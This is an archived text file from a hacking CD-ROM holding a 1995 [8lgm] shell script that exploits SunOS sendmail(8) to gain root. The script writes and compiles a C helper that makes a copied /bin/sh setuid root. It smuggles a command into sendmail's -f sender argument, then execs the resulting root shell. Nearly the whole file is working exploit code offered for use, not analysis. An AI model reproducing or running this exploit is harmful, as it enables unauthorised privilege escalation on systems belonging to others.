home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
SuperHack
/
SuperHack CD.bin
/
Hack
/
UNIX
/
SM8B.ZIP
/
SM8B.TXT
Wrap
Text File
|
1996-04-27
|
1KB
|
74 lines
**************************************************************************
HACK: Sendmail(8): Create suid root shells [8lgm]
System: SunOS
Source: [8lgm] at webserv@FOUR.net
Date: Aug 24,1995
**************************************************************************
ropt:
#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
# Written 1995 by [8LGM]
# Please do not use this script without permission.
#
PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG host"
exit 1
fi
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
PROG="`basename $0`"
EXECME=/tmp/HotterThanMojaveInMyHeart
# Create EXECME.c
cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
chown("/tmp/InfamousAngel", 0, 0);
chmod("/tmp/InfamousAngel", 04755);
}
EOF
cc -o $EXECME $EXECME.c
# Check we have EXECME
if [ ! -x $EXECME ]; then
echo "$PROG: couldnt compile $EXECME.c - check it out"
exit 1
fi
/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail
/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular
Hows it goin
EOF
exec /tmp/InfamousAngel